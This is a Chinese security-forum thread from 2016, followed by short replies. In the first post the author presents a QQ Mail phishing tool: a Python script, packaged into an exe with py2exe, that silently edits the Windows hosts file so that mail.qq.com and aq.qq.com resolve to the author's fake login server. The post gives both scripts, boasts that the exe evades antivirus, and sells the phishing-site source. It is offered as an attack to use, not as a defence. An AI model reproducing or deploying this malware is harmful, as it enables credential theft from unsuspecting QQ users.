请选择 进入手机版 | 继续访问电脑版

SSS安全论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

产品
产品
团队
团队
版规
版规
查看: 3389|回复: 57

Python开发一个猥琐实用的社工钓鱼QQ工具,以及思路

  [复制链接]
  • TA的每日心情

    2017-3-1 22:42
  • 签到天数: 15 天

    [LV.4]偶尔看看III

    发表于 2016-6-24 17:09:41 | 显示全部楼层 |阅读模式
    灵感起源于这样一篇娱乐技术文,看完发现可行性是很高的。修改host实现的钓鱼 首先可以让 受害者肉眼无法识别,其次是仅仅修改host 很容易可以绕过各种杀毒的提示拦截这篇文章内 是支付宝钓鱼,我们比葫芦画瓢来做一个qq邮箱的钓鱼(至于为什么是qq邮箱而不是别的,后面会有案例来讲)
    不知道为什么网上没有出现类似的木马(也可能是鄙人孤陋寡闻没见过..)所以就着手做一个给大家玩一玩..本文讲解较为细致,大牛看标题既可得知文章内容。无需耽误时间



    首先进入正文
    实现这个思路需要的工具:一个可以隐藏执行的修改HOST文件的 程序,这里我们暂且管他叫HOST木马,
    和一个伪造qq邮箱的钓鱼网站,这个我在网上没找到。于是自己着手写了一套简单的php的邮箱钓鱼界面

                                   
    登录/注册后可看大图

    大眼一看..没有什么问题的吧?哈。
    host的原理就不多说了 ,只讲一下效果。可以让域名按照攻击者的意愿在受害者的机器上被解析到指定的ip,我所搭建的鱼站ip为42.xxx.xxx.26
    所以host文件里应该这么写42.xxx.xxx.26 mail.qq.com 这样既可达到 让mail.qq.com在受害者机器上 解析到我鱼站ip的目的

    接下来讲一下这个host木马的编写思路
    说白了就是一个可以实现追加文本内容的exe程序,但本人只对php做过系统学习,Python只能说略有了解。
    但是很明显 要写一个这样的小木马,php做出来的效果有点蛋疼,开始找了一位朋友用易语言开发了一个试了一下。
    结果显而易见。。易语言写的空壳程序 360都报毒。。
    自己动手,丰衣足食。 改用Python来写一个小木马使用
    贴上Python的代码,是py27的
    [Python] 纯文本查看 复制代码
    # -*- coding: utf8 -*-
    #!/usr/bin/env python
    f=open('C:/Windows/System32/drivers/etc/hosts','a+')
    host='\r\n42.xxx.xxx.26 mail.qq.com\r\n42.xxx.xxx.26 aq.qq.com'
    f.write(str(host)+'\r\n')

    带上了qq安全中心的host ,以备以后深入开发鱼站使用..
    作为一个木马,当然要让他在没有Python环境的机器上也 顺利运行了。所以我用py2exe将这个Python脚本打包为exe程序。
    贴上打包代码
    [Python] 纯文本查看 复制代码
    # -*- coding: utf8 -*-
    from distutils.core import setup
    import py2exe, sys, os
    #该文件可直接生成压缩至一起的exe 执行setup.py py2exe
    setup(
            options = {'py2exe': {'bundle_files': 1}},
            zipfile = None,
            windows=['host.py']
    )

    py2exe在py27环境中并未内置,所以需要单独安装。当然有条件的也可以直接换用更合适的语言来编写该程序,显然Python写exe是很业余的..
    好处是过了杀毒。。

                                   
    登录/注册后可看大图


                                   
    登录/注册后可看大图

    单独利用起不到什么效果,需要结合一个钓鱼网站,鱼站源码一并附上了,解压密码为:
    游客,如果您要查看本帖隐藏内容请回复

    然而即使有了钓鱼网站 这个思路似乎还是有点鸡肋,所以等等会出一个 让他不鸡肋的利用方式...
    原文出自 NoSafe社区

    mail.zip

    12.88 KB, 下载次数: 23

    售价: 2 下载币  [记录]

    鱼站源码

    host.zip

    765 Bytes, 下载次数: 19

    售价: 2 下载币  [记录]

    host源码

    评分

    参与人数 2下载币 +4 好评 +2 荣誉 +1 收起 理由
    轩轩 + 2 666666,赞一个
    95zz + 2 + 2 + 1 支持一个,楼主多发干货。强调一下,要干货.

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2016-7-14 17:48
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2016-6-24 17:27:17 | 显示全部楼层
    print('感谢分享,可惜我看不懂')
  • TA的每日心情
    开心
    2017-4-22 09:46
  • 签到天数: 238 天

    [LV.7]常住居民III

    发表于 2016-6-24 18:59:17 | 显示全部楼层
    表示没看明白
  • TA的每日心情

    2017-4-21 20:41
  • 签到天数: 89 天

    [LV.6]常住居民II

    发表于 2016-6-24 20:29:38 | 显示全部楼层
    学习学习
    回复

    使用道具 举报

  • TA的每日心情

    2017-3-1 20:01
  • 签到天数: 120 天

    [LV.7]常住居民III

    发表于 2016-6-24 20:35:24 | 显示全部楼层
    谢谢分享    初学python   
  • TA的每日心情

    2017-4-3 14:32
  • 签到天数: 57 天

    [LV.5]常住居民I

    发表于 2016-6-24 20:46:25 | 显示全部楼层
    感谢分享。。。。。
    回复

    使用道具 举报

  • TA的每日心情

    6 天前
  • 签到天数: 89 天

    [LV.6]常住居民II

    发表于 2016-6-24 21:30:29 | 显示全部楼层
    95zz 发表于 2016-6-24 17:27
    print('感谢分享,可惜我看不懂')

    这是3的语法...
    print '这才是2的语法'
  • TA的每日心情
    无聊
    2017-4-21 16:57
  • 签到天数: 208 天

    [LV.7]常住居民III

    发表于 2016-6-24 23:02:57 | 显示全部楼层
    感谢分享,可惜我看不懂'
  • TA的每日心情
    奋斗
    7 天前
  • 签到天数: 340 天

    [LV.8]以坛为家I

    发表于 2016-6-24 23:22:11 | 显示全部楼层
    可以,可以发现一切吗?你的意思就是任何可以修改host的都可以达到这个效果?
  • TA的每日心情
    开心
    2017-3-31 15:50
  • 签到天数: 161 天

    [LV.7]常住居民III

    发表于 2016-6-25 00:42:30 | 显示全部楼层
    还要想想怎么深入利用啊
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    关注微信赢邀请码

    QQ|Archiver|手机版|网站地图|网页地图|SSS安全论坛 ( 黔ICP备15010987号  

    GMT+8, 2017-4-30 07:27 , Processed in 0.468000 second(s), 26 queries , Xcache On.

    Powered by SSS团队 X3.2

    © 2014-2015 Comsenz Inc.

    快速回复 返回顶部 返回列表